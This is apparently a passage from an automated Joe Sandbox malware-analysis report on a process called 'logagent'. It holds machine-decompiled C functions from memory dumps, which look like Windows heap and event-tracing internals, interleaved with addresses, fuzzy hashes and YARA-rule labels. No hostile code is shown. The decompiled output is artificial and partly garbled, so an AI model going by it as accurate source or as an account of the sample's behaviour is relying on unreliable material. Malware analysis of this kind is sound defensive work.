                                              0x05271361
                                              0x05271351
                                              0x0527135a
                                              0x0527135a
                                              0x0527136c
                                              0x0527136d
                                              0x0527136f
                                              0x05271374
                                              0x05271387

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 623fe7d84cfe45f182eb67a5b54eec493b5075daa41ee2fe5a20d34d626b04d2
                                              • Instruction ID: 01da82c622e57bf64841d111ba78aeb16dcef803d2c89055facae65247d39475
                                              • Opcode Fuzzy Hash: 623fe7d84cfe45f182eb67a5b54eec493b5075daa41ee2fe5a20d34d626b04d2
                                              • Instruction Fuzzy Hash: 2F013C75E1520CAFCB04EFA9D549AAEB7F4FF08700F404059B945EB381EA74AA10CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05288F6A Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E05288F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x52ad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E051D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                              0x05288f6a
                                              0x05288f79
                                              0x05288f81
                                              0x05288f84
                                              0x05288f8b
                                              0x05288f91
                                              0x05288f94
                                              0x05288f9e
                                              0x05288fb0
                                              0x05288fa0
                                              0x05288fa9
                                              0x05288fa9
                                              0x05288fbb
                                              0x05288fbc
                                              0x05288fbe
                                              0x05288fc3
                                              0x05288fd6

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2cdf48867c2f0c38f926e31fa5ff984efe98629ed70b94b1bfbb214dbcb91f77
                                              • Instruction ID: 7b29a5401a495d686dfbb4d1dc2daea4a7e13a1664ba3cf3656df6c3f58ef1e6
                                              • Opcode Fuzzy Hash: 2cdf48867c2f0c38f926e31fa5ff984efe98629ed70b94b1bfbb214dbcb91f77
                                              • Instruction Fuzzy Hash: 9D014F74A1520CAFCB04EFA8D549AAEB7F4FF18300F504459B905EB381EB74EA00CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05271608 Relevance: .0, Instructions: 34COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 46%
                                              			E05271608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x52ad360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E051D7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                              0x05271608
                                              0x05271617
                                              0x0527161d
                                              0x05271625
                                              0x05271628
                                              0x0527162b
                                              0x05271636
                                              0x05271648
                                              0x05271638
                                              0x05271641
                                              0x05271641
                                              0x05271653
                                              0x05271654
                                              0x05271656
                                              0x0527165b
                                              0x0527166e

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14124532560f426e902624c80b51ccc7b87f4dad9244a712b704f116b0a407e0
                                              • Instruction ID: 77fea53c55c9d51980497dd3acf065adf3ec6bfa30edc474b8cd46197d98a2ca
                                              • Opcode Fuzzy Hash: 14124532560f426e902624c80b51ccc7b87f4dad9244a712b704f116b0a407e0
                                              • Instruction Fuzzy Hash: 75F06271A1424CEFCB04EFA9D40AA6EB7F4EF04300F444059B905EB381EA34DA10CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051DC577 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051DC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E051DC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x51911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E052888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                              0x051dc577
                                              0x051dc57d
                                              0x051dc581
                                              0x051dc5b5
                                              0x051dc5b9
                                              0x051dc5ce
                                              0x051dc5ce
                                              0x051dc5ca
                                              0x00000000
                                              0x051dc5ca
                                              0x051dc5c4
                                              0x051dc5c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051dc5ad
                                              0x00000000
                                              0x051dc5af

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e52d78cc2f251d9df79d7b4414966344f98ce650f03ea680a9aa3cf6e754f238
                                              • Instruction ID: 1172013749226aee418be7bf851ae5aa9afd1bc215b777a988e2733daa520a43
                                              • Opcode Fuzzy Hash: e52d78cc2f251d9df79d7b4414966344f98ce650f03ea680a9aa3cf6e754f238
                                              • Instruction Fuzzy Hash: 53F0FAB2B192909ED735C328C10CF22FBEAAB042F8F458D66D40783201C3A4CC80CAF0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05288D34 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E05288D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x52ad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E051D7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                              0x05288d34
                                              0x05288d43
                                              0x05288d4b
                                              0x05288d4e
                                              0x05288d52
                                              0x05288d5c
                                              0x05288d6e
                                              0x05288d5e
                                              0x05288d67
                                              0x05288d67
                                              0x05288d79
                                              0x05288d7a
                                              0x05288d7c
                                              0x05288d81
                                              0x05288d94

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6726e063e5ab8db9d545ac35ba94a31f03fa5ad0c16cbed6148597bc30f3eed1
                                              • Instruction ID: 377575a81ba1f9d50f6e067ab381d35cef15a384ea995af7e8f52e1010d4563d
                                              • Opcode Fuzzy Hash: 6726e063e5ab8db9d545ac35ba94a31f03fa5ad0c16cbed6148597bc30f3eed1
                                              • Instruction Fuzzy Hash: 0AF0B470A146089FCB04FFB8D445B6EB7B4EF04300F508499E905EB2C1DA34D900CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05272073 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E05272073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0526FD22(__ecx);
				_t19 =  *0x52a849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x52a8748; // 0x0
					if(__eflags <= 0) {
						E05271C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x52a8724 & 0x00000004;
							if(( *0x52a8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x52a8724; // 0x0
					return E05268DF1(__ebx, 0xc0000374, 0x52a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                              0x05272076
                                              0x05272078
                                              0x0527207d
                                              0x05272083
                                              0x052720a4
                                              0x052720aa
                                              0x052720ac
                                              0x052720b7
                                              0x052720ba
                                              0x052720bc
                                              0x052720c9
                                              0x052720c9
                                              0x052720d0
                                              0x052720d2
                                              0x00000000
                                              0x052720d2
                                              0x052720be
                                              0x052720c3
                                              0x052720c5
                                              0x052720c7
                                              0x00000000
                                              0x00000000
                                              0x052720c7
                                              0x052720bc
                                              0x052720d4
                                              0x05272085
                                              0x05272085
                                              0x052720a3
                                              0x052720a3

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 821de3782cc4ed2860ad0617a6e8edd84f13f2dbb8472c157d7bc49d7e0f6800
                                              • Instruction ID: 840116fe3029128339139f922c3ef5b7006ba573f2a85dfff4df23c71a97a0e1
                                              • Opcode Fuzzy Hash: 821de3782cc4ed2860ad0617a6e8edd84f13f2dbb8472c157d7bc49d7e0f6800
                                              • Instruction Fuzzy Hash: 99F0202FA3619A8BCE32EB35390A6E27F91FF55110B090085E49627240CA3588C3CA31
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F927A Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E051F927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E051FFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E051F92C6(_t11, _t14);
				}
				return _t11;
			}





                                              0x051f9295
                                              0x051f9299
                                              0x051f929f
                                              0x051f92aa
                                              0x051f92ad
                                              0x051f92ae
                                              0x051f92af
                                              0x051f92b0
                                              0x051f92b4
                                              0x051f92bb
                                              0x051f92bb
                                              0x051f92c5

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction ID: 6c0b5687ad4d812f874638f0c181c2399301777e484a0d38e5404c29c43c09b1
                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction Fuzzy Hash: 6DE065723409406BD711AF55DCC4B577659AF82721F044079B6055E243C7E6D91987A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051D746D Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E051D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E051CEB70(__ecx, 0x52a79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E051F95D0();
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                              0x051d746d
                                              0x051d746d
                                              0x051d746d
                                              0x051d7471
                                              0x051d7488
                                              0x0521f92d
                                              0x051d748e
                                              0x051d7491
                                              0x051d7495
                                              0x0521f937
                                              0x0521f93a
                                              0x0521f94e
                                              0x0521f953
                                              0x0521f956
                                              0x0521f956
                                              0x051d7495
                                              0x00000000
                                              0x051d7488
                                              0x051d7473
                                              0x051d7478
                                              0x051d747d
                                              0x051d7481
                                              0x00000000
                                              0x051d7481
                                              0x051d747d
                                              0x051d747a
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87a9755615c1005f3950c63c28eb165588eb81c2cff62d6dad6afa06c252a257
                                              • Instruction ID: abacc7e5b18e0429633ba11834ce2d7a870121034441248074aced566fa2f073
                                              • Opcode Fuzzy Hash: 87a9755615c1005f3950c63c28eb165588eb81c2cff62d6dad6afa06c252a257
                                              • Instruction Fuzzy Hash: 46F02E30A14144AACF13EB68C890F7AFBA2FF00210F140216D862AB0E1E7248C01CBF9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05288CD6 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 36%
                                              			E05288CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x52ad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E051D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                              0x05288ce5
                                              0x05288ced
                                              0x05288cf0
                                              0x05288cfb
                                              0x05288d0d
                                              0x05288cfd
                                              0x05288d06
                                              0x05288d06
                                              0x05288d18
                                              0x05288d19
                                              0x05288d1b
                                              0x05288d20
                                              0x05288d33

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1299a2299448e02dcb5ff087a42bf37dc380432280c8a69e12135c849745d7f7
                                              • Instruction ID: 2054f3f51f0caa6405a90d89a936006ba8a311c2f3d420735281714c5cf2fd96
                                              • Opcode Fuzzy Hash: 1299a2299448e02dcb5ff087a42bf37dc380432280c8a69e12135c849745d7f7
                                              • Instruction Fuzzy Hash: 50F08274A15608ABCB04EBB9E94AE6EB7B4EF09300F500599F916EB2C1EA34D900CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B4F2E Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051B4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E052888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E051DC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5191030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                              0x051b4f2e
                                              0x051b4f34
                                              0x051b4f38
                                              0x05210b85
                                              0x05210b85
                                              0x05210b89
                                              0x05210b9a
                                              0x05210b9a
                                              0x05210b9f
                                              0x00000000
                                              0x05210b9f
                                              0x05210b94
                                              0x05210b98
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05210b98
                                              0x051b4f3e
                                              0x051b4f48
                                              0x00000000
                                              0x051b4f6e
                                              0x00000000
                                              0x051b4f70

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08ac743d28c620fd7ffb184b0e5e767587439d9260353982bc6bc51189ab0652
                                              • Instruction ID: ac0a5f4bb46108401258177d8cdd392de92285ae747619fda30866cb23916b94
                                              • Opcode Fuzzy Hash: 08ac743d28c620fd7ffb184b0e5e767587439d9260353982bc6bc51189ab0652
                                              • Instruction Fuzzy Hash: 78F090719356869FD760DB18C248F23B7D5BF10778F454475D80A87915C764D980C648
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05288B58 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 36%
                                              			E05288B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x52ad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E051D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                              0x05288b67
                                              0x05288b6f
                                              0x05288b72
                                              0x05288b7d
                                              0x05288b8f
                                              0x05288b7f
                                              0x05288b88
                                              0x05288b88
                                              0x05288b9a
                                              0x05288b9b
                                              0x05288b9d
                                              0x05288ba2
                                              0x05288bb5

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a311571e7d3842c940723f78209f130a5f1cbdae17fe6ad0b4d835d16806220f
                                              • Instruction ID: 212a693e9d8729ebeef570bf68c0067cad9e61eb633971167ee2b223c4c26d6f
                                              • Opcode Fuzzy Hash: a311571e7d3842c940723f78209f130a5f1cbdae17fe6ad0b4d835d16806220f
                                              • Instruction Fuzzy Hash: 49F082B0B25258ABDB04FBA8D90AE7EB7B4EF44300F440459BA05DB3C1EB74D900C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EA44B Relevance: .0, Instructions: 29COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051EA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x52a7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E051FFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                              0x051ea44b
                                              0x051ea453
                                              0x051ea472
                                              0x051ea476
                                              0x00000000
                                              0x051ea493
                                              0x051ea47a
                                              0x051ea47f
                                              0x051ea486
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba6f797997a8dd4b9031ae514fe8d12ebbddf314026b1505709b214a218dfc82
                                              • Instruction ID: 62a007294c678a9fc7dfff560fae819277672f53d99d335bdeb6a18dc54beb71
                                              • Opcode Fuzzy Hash: ba6f797997a8dd4b9031ae514fe8d12ebbddf314026b1505709b214a218dfc82
                                              • Instruction Fuzzy Hash: 03E092B2B01821ABD2229B18BC44F66B39DEFD4651F0E4435F505C7250DB68DD12C7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BF358 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E051BF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E051EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L051D4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                              0x051bf35d
                                              0x051bf361
                                              0x051bf367
                                              0x051bf372
                                              0x051bf38c
                                              0x051bf38c
                                              0x051bf394

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                              • Instruction ID: 042702cfee4444322438f82f794448c873d518d37b8857fa9e29386f9c637531
                                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                              • Instruction Fuzzy Hash: 99E0D832A40118BBDB2196D99D05F9ABBACDB44A60F000255F904D7160D6B19D00C3D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051CFF60 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051CFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x51911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E052888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E051D0050(_t14);
				}
			}










                                              0x051cff66
                                              0x051cff6b
                                              0x00000000
                                              0x051cff8f
                                              0x00000000
                                              0x051cff8f

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
